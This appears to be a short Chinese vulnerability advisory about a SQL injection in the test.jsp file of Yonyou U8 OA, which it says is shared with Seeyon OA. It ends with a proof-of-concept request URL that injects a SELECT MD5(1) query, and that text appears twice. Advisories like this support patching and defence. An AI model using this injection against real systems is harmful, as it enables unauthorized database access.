用友 U8 OA test.jsp SQL注入漏洞
漏洞描述
用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞
漏洞影响
网络测绘
漏洞复现
登录页面如下
验证POC
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞
登录页面如下
验证POC
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))